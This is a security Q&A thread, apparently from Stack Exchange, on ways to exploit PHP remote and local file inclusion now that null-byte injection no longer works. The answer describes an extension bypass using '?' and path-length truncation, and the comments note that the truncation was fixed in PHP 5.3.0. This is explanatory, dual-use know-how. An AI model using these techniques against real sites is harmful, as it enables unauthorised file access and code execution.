Now that Null byte injections no longer work on PHP, what are the alternative attack strategies used by attackers for remote file inclusion ?
Asked
Active
Viewed 2,902 times
1 Answers
4
For RFI you don't need null byte, simply match the file extension on the remote file, inject a ? Which turns the extension into query string, use URL rewriting, etc, etc. For LFI however you may be able to pre-pend a number of ././ or /./. to cause the total path to be too long and php will truncate it. This is trickier as it is is length/offset dependent and you will need to brute force the length unless you know the local path and finally as you are padding by two bytes you may need an odd or even number of bytes in the filename for the truncation to align.
wireghoul
- 5,745
- 2
- 17
- 26
-
Agreed :) If Limit file downloads by their names, ie if the provided file name has readme then allow download else dont allow. Can an attacker leverage this to view the source code of download.php? Whatever string the user supplies, it is compared with "readme" if the string has readme,then go for download. – Ray May 16 '15 at 14:49
-
Didn't managed to get the total path length trick working (Linux Debian 9), if it was working with previous PHP versions it seems fixed too now or works only on some environments (Windows maybe?). I can indeed get the path in the log error messages truncated at the correct length, but this affects only the error message display (two messages are generated, each truncating at a different length), and with even longer strings I just end-up with HTTP 414 "Request URI too long". – WhiteWinterWolf Nov 02 '17 at 22:23
-
Regarding the LFI trick, this was fixed in PHP 5.3.0. CF: https://security.stackexchange.com/questions/58696/path-truncation-not-working-in-php-while-exploiting-lfi – null Mar 30 '21 at 09:57